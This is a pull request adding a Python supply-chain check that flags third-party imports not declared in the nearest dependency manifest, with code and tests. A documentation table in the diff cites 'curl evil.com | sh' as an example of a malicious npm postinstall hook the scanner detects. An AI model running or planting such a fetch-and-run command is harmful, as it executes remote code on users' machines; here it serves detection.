### PR TITLE
feat(supply-chain): detect undeclared Python imports

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,10 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Added
+
+- Static supply-chain checks now compare runtime Python imports with the nearest `pyproject.toml` or requirements manifest, excluding standard-library, local, and type-checking-only imports.
+
 ## [0.1.4] - 2026-06-12
 
 ### Security

--- a/docs/analysis/security-checks.md
+++ b/docs/analysis/security-checks.md
@@ -612,6 +612,13 @@ Scores ≥5 produce MEDIUM; ≥8 produce HIGH findings.
 | npm `postinstall` script | HIGH | `"postinstall": "curl evil.com \| sh"` |
 | Docker `FROM` without digest | HIGH | `FROM node:latest` |
 
+For Python source files, the same analyzer also reports each third-party import
+that is absent from the nearest `pyproject.toml`, `requirements.txt`, or
+`requirements-dev.txt`. Standard-library imports, relative/local modules, and
+imports guarded by `TYPE_CHECKING` are ignored. One finding is emitted per
+missing distribution with the first source location as evidence; repeated
+imports do not multiply the finding count.
+
 **Run with CVE scanning:**
 
 ```bash

--- a/src/mcts/analyzers/manifest_deps.py
+++ b/src/mcts/analyzers/manifest_deps.py
@@ -2,15 +2,37 @@
 
 from __future__ import annotations
 
+import ast
 import json
 import re
+import sys
 import tomllib
 from dataclasses import dataclass
+from functools import lru_cache
 from pathlib import Path
 
 UNPINNED_PATTERN = re.compile(r"(\^|~|\*|latest|>=|<=|>|<)", re.I)
 _PEP508_NAME = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")
 _SKIP_DEPENDENCY_NAMES = frozenset({"python", "python_version"})
+_PEP508_REQUIREMENT = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)")
+
+# Distribution names and import roots are not always identical.  Keep this
+# table deliberately small and conservative: an unknown import is still
+# useful evidence, while an incorrect alias would hide a real gap.
+_IMPORT_TO_DISTRIBUTION = {
+    "attr": "attrs",
+    "bs4": "beautifulsoup4",
+    "cv2": "opencv-python",
+    "Crypto": "pycryptodome",
+    "dateutil": "python-dateutil",
+    "dotenv": "python-dotenv",
+    "jwt": "pyjwt",
+    "multipart": "python-multipart",
+    "PIL": "pillow",
+    "sklearn": "scikit-learn",
+    "yaml": "pyyaml",
+}
+_STDLIB_MODULES = frozenset(getattr(sys, "stdlib_module_names", ()))
 
 
 @dataclass(frozen=True)
@@ -22,6 +44,85 @@ class DeclaredDependency:
 
 def normalize_package_name(name: str) -> str:
     return name.lower().replace("_", "-")
+
+
+def iter_requirement_names(path: Path) -> set[str]:
+    """Return normalized distribution names declared in a requirements file."""
+    try:
+        text = path.read_text(encoding="utf-8")
+    except (OSError, UnicodeError):
+        return set()
+
+    names: set[str] = set()
+    for raw_line in text.splitlines():
+        line = raw_line.split("#", 1)[0].strip()
+        if not line or line.startswith("-") or "://" in line or line.startswith((".", "/", "\\")):
+            # Includes, editable installs, paths, and pip options need their
+            # own resolution semantics; do not guess at their package set.
+            continue
+        match = _PEP508_REQUIREMENT.match(line)
+        if match:
+            names.add(normalize_package_name(match.group(1)))
+    return names
+
+
+def import_distribution_name(module: str) -> str:
+    """Map an import root to its best-known distribution name."""
+    return normalize_package_name(_IMPORT_TO_DISTRIBUTION.get(module, module))
+
+
+def is_stdlib_module(module: str) -> bool:
+    """Return whether an import root belongs to the Python standard library."""
+    return module in _STDLIB_MODULES or module in {"__future__", "builtins"}
+
+
+@lru_cache(maxsize=2048)
+def _parse_python_imports(path: str, mtime_ns: int, size: int) -> tuple[tuple[str, int], ...]:
+    """Parse one Python file, keyed by stat data so repeated scans reuse ASTs."""
+    del mtime_ns, size
+    try:
+        tree = ast.parse(Path(path).read_text(encoding="utf-8"), filename=path)
+    except (OSError, UnicodeError, SyntaxError):
+        return ()
+
+    imports: list[tuple[str, int]] = []
+
+    class _Collector(ast.NodeVisitor):
+        def visit_Import(self, node: ast.Import) -> None:
+            for alias in node.names:
+                imports.append((alias.name.split(".", 1)[0], node.lineno))
+
+        def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
+            if node.level == 0 and node.module and node.module != "__future__":
+                imports.append((node.module.split(".", 1)[0], node.lineno))
+
+        def visit_If(self, node: ast.If) -> None:
+            # Imports guarded by TYPE_CHECKING are not runtime dependencies.
+            test = node.test
+            type_checking = isinstance(test, ast.Name) and test.id == "TYPE_CHECKING"
+            type_checking = type_checking or (
+                isinstance(test, ast.Attribute)
+                and test.attr == "TYPE_CHECKING"
+                and isinstance(test.value, ast.Name)
+                and test.value.id == "typing"
+            )
+            if not type_checking:
+                self.generic_visit(node)
+            else:
+                for child in node.orelse:
+                    self.visit(child)
+
+    _Collector().visit(tree)
+    return tuple(imports)
+
+
+def iter_python_imports(path: Path) -> tuple[tuple[str, int], ...]:
+    """Return static, runtime import roots and source lines for one file."""
+    try:
+        stat = path.stat()
+    except OSError:
+        return ()
+    return _parse_python_imports(str(path), stat.st_mtime_ns, stat.st_size)
 
 
 def is_unpinned_spec(spec: str) -> bool:

--- a/src/mcts/analyzers/supply_chain.py
+++ b/src/mcts/analyzers/supply_chain.py
@@ -9,8 +9,12 @@ from pathlib import Path
 from mcts.analyzers.base import BaseAnalyzer
 from mcts.analyzers.manifest_deps import (
     UNPINNED_PATTERN,
+    import_distribution_name,
+    is_stdlib_module,
     is_unpinned_spec,
     iter_pyproject_dependencies,
+    iter_python_imports,
+    iter_requirement_names,
     load_locked_versions,
     normalize_package_name,
 )
@@ -41,7 +45,53 @@ class SupplyChainAnalyzer(BaseAnalyzer):
         findings.extend(self._scan_package_json(root))
         findings.extend(self._scan_pyproject(root))
         findings.extend(self._scan_requirements(root))
+        findings.extend(self._scan_undeclared_python_imports(root))
         findings.extend(self._scan_dockerfile(root))
+        return findings
+
+    def _scan_undeclared_python_imports(self, root: Path) -> list[Finding]:
+        """Compare runtime Python imports with the nearest dependency manifest."""
+        paths = _find_python_files(root)
+        if not paths:
+            return []
+
+        manifest_roots, declared_by_root = _python_manifest_declarations(root)
+        local_modules = _local_python_modules(root, paths)
+        imports: dict[str, tuple[Path, int, str]] = {}
+        for path in paths:
+            project_root = _nearest_manifest_root(path, manifest_roots) or root
+            declared = declared_by_root.get(project_root, set())
+            for module, line in iter_python_imports(path):
+                if is_stdlib_module(module) or module in local_modules:
+                    continue
+                distribution = import_distribution_name(module)
+                if distribution in declared:
+                    continue
+                imports.setdefault(distribution, (path, line, module))
+
+        findings: list[Finding] = []
+        for distribution, (path, line, module) in sorted(imports.items()):
+            findings.append(
+                _finding(
+                    path,
+                    f"supply-undeclared-import-{distribution}",
+                    f"Undeclared runtime Python import: {distribution}",
+                    (
+                        f"Runtime code imports {distribution!r}, but the nearest Python "
+                        "dependency manifest does not declare it."
+                    ),
+                    Severity.MEDIUM,
+                    "MCTS-T-1014",
+                    line=line,
+                    evidence={
+                        "package": distribution,
+                        "import": module,
+                        "scope": "runtime",
+                        "analysis_mode": "static_import_manifest",
+                        "risk_tags": ["undeclared_import"],
+                    },
+                )
+            )
         return findings
 
     def _scan_package_json(self, root: Path) -> list[Finding]:
@@ -182,6 +232,64 @@ def _find_files(root: Path, name: str) -> list[Path]:
             continue
         results.append(path)
     return results[:20]
+
+
+def _find_python_files(root: Path) -> list[Path]:
+    """Return bounded Python source paths, excluding tests and generated trees."""
+    if root.is_file():
+        return [root] if root.suffix == ".py" and not _is_test_path(root) else []
+    paths = [
+        path
+        for path in root.rglob("*.py")
+        if not any(part in DEFAULT_EXCLUDE_DIRS for part in path.parts) and not _is_test_path(path)
+    ]
+    return sorted(paths)[:1000]
+
+
+def _is_test_path(path: Path) -> bool:
+    return (
+        "tests" in path.parts
+        or "test" in path.parts
+        or path.name.startswith("test_")
+        or path.name.endswith("_test.py")
+    )
+
+
+def _python_manifest_declarations(root: Path) -> tuple[list[Path], dict[Path, set[str]]]:
+    """Collect dependency declarations grouped by each project manifest root."""
+    declarations: dict[Path, set[str]] = {}
+    for path in _find_files(root, "pyproject.toml"):
+        manifest_root = path.parent.resolve()
+        declarations.setdefault(manifest_root, set()).update(
+            normalize_package_name(dep.name) for dep in iter_pyproject_dependencies(path)
+        )
+    for filename in ("requirements.txt", "requirements-dev.txt"):
+        for path in _find_files(root, filename):
+            declarations.setdefault(path.parent.resolve(), set()).update(iter_requirement_names(path))
+    return sorted(declarations), declarations
+
+
+def _nearest_manifest_root(path: Path, roots: list[Path]) -> Path | None:
+    resolved = path.resolve()
+    candidates = [project_root for project_root in roots if project_root in resolved.parents]
+    return max(candidates, key=lambda project_root: len(project_root.parts)) if candidates else None
+
+
+def _local_python_modules(root: Path, paths: list[Path]) -> set[str]:
+    """Find import roots provided by the scanned repository itself."""
+    modules: set[str] = set()
+    for path in paths:
+        try:
+            relative = path.resolve().relative_to(root.resolve())
+        except ValueError:
+            continue
+        parts = relative.parts
+        if not parts:
+            continue
+        modules.add(Path(parts[0]).stem if parts[0].endswith(".py") else parts[0])
+        if len(parts) > 1 and parts[0] == "src":
+            modules.add(parts[1].removesuffix(".py"))
+    return modules
 
 
 def _finding(

--- a/tests/test_manifest_deps.py
+++ b/tests/test_manifest_deps.py
@@ -5,7 +5,11 @@ from __future__ import annotations
 from pathlib import Path
 
 from mcts.analyzers.manifest_deps import (
+    import_distribution_name,
+    is_stdlib_module,
     iter_pyproject_dependencies,
+    iter_python_imports,
+    iter_requirement_names,
     load_locked_versions,
     normalize_package_name,
 )
@@ -167,3 +171,78 @@ dependencies = ["pydantic>=2.13.4"]
     deps = iter_pyproject_dependencies(pyproject)
     assert len(deps) == 1
     assert deps[0].name == "pydantic"
+
+
+def test_runtime_imports_are_parsed_without_type_checking_imports(tmp_path: Path) -> None:
+    source = tmp_path / "app.py"
+    source.write_text(
+        """
+import requests
+from gql import gql
+import json
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    import cachetools
+""".strip(),
+        encoding="utf-8",
+    )
+
+    imports = dict(iter_python_imports(source))
+    assert set(imports) == {"requests", "gql", "json", "typing"}
+    assert is_stdlib_module("json")
+    assert not is_stdlib_module("requests")
+    assert import_distribution_name("requests") == "requests"
+
+
+def test_requirement_names_ignore_options_and_urls(tmp_path: Path) -> None:
+    requirements = tmp_path / "requirements.txt"
+    requirements.write_text(
+        "requests==2.31.0\n-r base.txt\ngit+https://example.invalid/demo.git\n",
+        encoding="utf-8",
+    )
+
+    assert iter_requirement_names(requirements) == {"requests"}
+
+
+def test_supply_chain_flags_undeclared_runtime_imports(tmp_path: Path) -> None:
+    (tmp_path / "app.py").write_text(
+        "\n".join(
+            [
+                "import requests",
+                "from gql import gql",
+                "import cachetools",
+                "import json",
+                "import os",
+            ]
+        ),
+        encoding="utf-8",
+    )
+    (tmp_path / "local.py").write_text("VALUE = 1\n", encoding="utf-8")
+
+    findings = SupplyChainAnalyzer(target=tmp_path).analyze(_server())
+    undeclared = {
+        finding.evidence["package"]
+        for finding in findings
+        if finding.title.startswith("Undeclared runtime Python import")
+    }
+    assert undeclared == {"cachetools", "gql", "requests"}
+    assert all(
+        finding.location and finding.location.file.endswith("app.py")
+        for finding in findings
+        if finding.title.startswith("Undeclared runtime")
+    )
+
+
+def test_supply_chain_accepts_imports_declared_in_requirements(tmp_path: Path) -> None:
+    (tmp_path / "app.py").write_text(
+        "import requests\nfrom gql import gql\nimport cachetools\nimport json\n",
+        encoding="utf-8",
+    )
+    (tmp_path / "requirements.txt").write_text(
+        "requests==2.31.0\ngql>=3.0\ncachetools==5.5.0\n",
+        encoding="utf-8",
+    )
+
+    findings = SupplyChainAnalyzer(target=tmp_path).analyze(_server())
+    assert not any(finding.title.startswith("Undeclared runtime") for finding in findings)


### PR DESCRIPTION
## Summary

- compare runtime Python imports with the nearest Python dependency manifest
- ignore standard-library, relative/local, and `TYPE_CHECKING`-only imports
- emit one actionable finding per undeclared distribution with source evidence

Fixes #199

## Test plan

- [x] `uv run pytest -q tests/test_manifest_deps.py tests/test_supply_chain.py tests/scoring/test_evidence_coverage.py`
- [x] `uv run ruff check .`
- [x] `uv run ruff format --check .`
- [x] `uv run python scripts/compile_sigma_rules.py --source tests/fixtures/sigma_fixtures --validate-min 6`
